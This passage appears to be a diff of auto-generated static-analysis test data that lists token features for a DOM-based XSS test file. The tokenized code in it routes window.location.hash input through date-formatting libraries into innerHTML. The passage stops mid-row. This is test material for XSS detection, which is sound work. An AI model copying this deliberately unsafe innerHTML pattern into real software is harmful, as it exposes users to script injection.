| +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:68 | exceptional return of dateFns ... taint) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:68 | exceptional return of dateFns ... taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:11:50:11:55 | format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:11:50:11:55 | format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:11:50:11:55 | format | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:11:50:11:55 | format | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:11:50:11:55 | format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:11:57:11:60 | time | CalleeFlexibleAccessPath | dateFns.format | | autogenerated/Xss/DomBasedXss/dates.js:11:57:11:60 | time | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:11:57:11:60 | time | calleeImports | date-fns | @@ -12868,12 +96595,74 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:11:63:11:67 | taint | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:11:63:11:67 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:11:63:11:67 | taint | receiverName | dateFns | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:12 | document | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:12 | document | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:17 | document.body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:17 | document.body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:27 | documen ... nerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:27 | documen ... nerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:73 | documen ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:73 | documen ... aint)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:73 | documen ... aint)}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:73 | documen ... aint)}` | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:12:5:12:73 | documen ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:12:14:12:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:12:14:12:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:12:14:12:17 | body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:12:14:12:17 | body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:12:14:12:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:12:19:12:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:12:19:12:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:12:19:12:27 | innerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:12:19:12:27 | innerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:12:19:12:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:12:31:12:73 | `Time i ... aint)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:12:31:12:73 | `Time i ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:12:31:12:73 | `Time i ... aint)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:12:31:12:73 | `Time i ... aint)}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:12:31:12:73 | `Time i ... aint)}` | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:12:31:12:73 | `Time i ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:12:32:12:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:12:32:12:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:12:32:12:39 | Time is | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:12:32:12:39 | Time is | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:12:32:12:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:12:32:12:39 | Time is | stringConcatenatedWith | -endpoint- dateFnsEsm.format() | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:51 | dateFnsEsm | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:51 | dateFnsEsm | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:51 | dateFnsEsm | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:51 | dateFnsEsm | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:51 | dateFnsEsm | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:58 | dateFnsEsm.format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:58 | dateFnsEsm.format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:58 | dateFnsEsm.format | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:58 | dateFnsEsm.format | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:58 | dateFnsEsm.format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:71 | dateFns ... taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:71 | dateFns ... taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:71 | dateFns ... taint) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:71 | dateFns ... taint) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:71 | dateFns ... taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:71 | dateFns ... taint) | stringConcatenatedWith | 'Time is ' -endpoint- | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:71 | exceptional return of dateFns ... taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:71 | exceptional return of dateFns ... taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:71 | exceptional return of dateFns ... taint) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:71 | exceptional return of dateFns ... taint) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:12:42:12:71 | exceptional return of dateFns ... taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:12:53:12:58 | format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:12:53:12:58 | format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:12:53:12:58 | format | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:12:53:12:58 | format | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:12:53:12:58 | format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:12:60:12:63 | time | CalleeFlexibleAccessPath | dateFnsEsm.format | | autogenerated/Xss/DomBasedXss/dates.js:12:60:12:63 | time | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:12:60:12:63 | time | calleeImports | date-fns/esm | @@ -12892,12 +96681,84 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:12:66:12:70 | taint | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:12:66:12:70 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:12:66:12:70 | taint | receiverName | dateFnsEsm | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:12 | document | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:12 | document | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:17 | document.body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:17 | document.body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:27 | documen ... nerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:27 | documen ... nerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:72 | documen ... time)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:72 | documen ... time)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:72 | documen ... time)}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:72 | documen ... time)}` | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:13:5:13:72 | documen ... time)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:13:14:13:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:13:14:13:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:13:14:13:17 | body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:13:14:13:17 | body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:13:14:13:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:13:19:13:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:13:19:13:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:13:19:13:27 | innerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:13:19:13:27 | innerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:13:19:13:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:13:31:13:72 | `Time i ... time)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:13:31:13:72 | `Time i ... time)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:13:31:13:72 | `Time i ... time)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:13:31:13:72 | `Time i ... time)}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:13:31:13:72 | `Time i ... time)}` | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:13:31:13:72 | `Time i ... time)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:13:32:13:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:13:32:13:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:13:32:13:39 | Time is | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:13:32:13:39 | Time is | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:13:32:13:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:13:32:13:39 | Time is | stringConcatenatedWith | -endpoint- dateFnsFp.format()() | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:50 | dateFnsFp | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:50 | dateFnsFp | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:50 | dateFnsFp | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:50 | dateFnsFp | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:50 | dateFnsFp | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:57 | dateFnsFp.format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:57 | dateFnsFp.format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:57 | dateFnsFp.format | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:57 | dateFnsFp.format | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:57 | dateFnsFp.format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:64 | dateFns ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:64 | dateFns ... (taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:64 | dateFns ... (taint) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:64 | dateFns ... (taint) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:64 | dateFns ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:13:42:13:64 | exceptional return of dateFns ... (taint) | 